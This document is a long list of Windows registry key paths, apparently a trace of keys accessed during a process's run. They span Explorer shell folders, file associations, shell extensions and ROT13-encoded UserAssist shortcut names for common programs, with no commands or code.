HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{43668BF8-C14E-49B2-97C9-747784D784B7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{43668BF8-C14E-49B2-97C9-747784D784B7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{915221FB-9EFE-4BDA-8FD7-F78DCA774F87}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{915221FB-9EFE-4BDA-8FD7-F78DCA774F87}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\UsersFiles\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\UsersFiles\NameSpace\DelegateFolders\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\UsersFiles\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\UsersFiles\NameSpace\DelegateFolders
HKEY_CLASSES_ROOT\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder
HKEY_CLASSES_ROOT\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{dffacdc5-679f-4156-8947-c5c76bc0b67f}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\shdocvw.dll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\cscript.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\cscript.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_CLASSES_ROOT\.
HKEY_CLASSES_ROOT\.\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
HKEY_CLASSES_ROOT\Unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\NeverShowExt
HKEY_CLASSES_ROOT\.8
HKEY_CLASSES_ROOT\.8\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.8\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.8
HKEY_CLASSES_ROOT\SystemFileAssociations\.8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CLASSES_ROOT\.url
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)
HKEY_CLASSES_ROOT\.url\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.url\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.url
HKEY_CLASSES_ROOT\InternetShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\DocObject
HKEY_CLASSES_ROOT\SystemFileAssociations\.url
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\Implemented Categories\{00021490-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\NeverShowExt
HKEY_CLASSES_ROOT\.pyw
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\(Default)
HKEY_CLASSES_ROOT\.pyw\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pyw\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pyw
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pyw\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pyw\UserChoice
HKEY_CLASSES_ROOT\Python.NoConFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.pyw
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\*
HKEY_CURRENT_USER\Software\Classes\*\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\MyComputer\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\MyComputer\NameSpace\DelegateFolders
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Sversbk Cevingr Oebjfvat.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Zvpebfbsg BarQevir.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong Ernqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Rkpry 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\BarAbgr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Bhgybbx 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreCbvag 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Choyvfure 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fxlcr sbe Ohfvarff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jbeq 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\7-Mvc\7-Mvc Svyr Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
